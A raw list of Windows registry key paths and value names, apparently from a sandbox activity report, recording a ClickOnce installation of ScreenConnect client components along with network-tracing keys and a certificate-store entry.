HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
StateStore_RandomString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
{c989bb7a-8385-4715-98cf-a741a8edb823}!ApplicationTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!010000007104d90af00b0000580100000000000000000000f3bd47179b28db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ApplicationSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsFullTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsShellVisible
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PreviousBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ExcludedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentProviderUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!MinimumRequiredVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!LastCheckTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkippedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkipTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!AppType
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!CurrentBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\Files
ScreenConnect.Client.dll_fc1d7bd48553fcab
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment
OnlineAppQuotaUsageEstimate
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
lock!10000000e303040bf00b00005801000000000000000000004611eaa6a128db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
lock!0e000000e303040bf00b00005801000000000000000000004611eaa6a128db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
lock!0c000000e303040bf00b00005801000000000000000000004611eaa6a128db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
lock!0a000000e303040bf00b00005801000000000000000000004611eaa6a128db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
lock!08000000e303040bf00b00005801000000000000000000004611eaa6a128db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!06000000e303040bf00b00005801000000000000000000004611eaa6a128db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
lock!04000000e303040bf00b00005801000000000000000000004611eaa6a128db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
PreparedForExecution
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
lock!110000000204040bf00b000058010000000000000000000023d7eea6a128db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.ClientService.exe_5e8c1e841cd8db20
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe_89b7a517a15abfdc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe.config_5db10293a642be8a
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsClient.exe.config_432322067acab5c0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe.config_bc78256f1e952942
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe_74b82db4db38179e
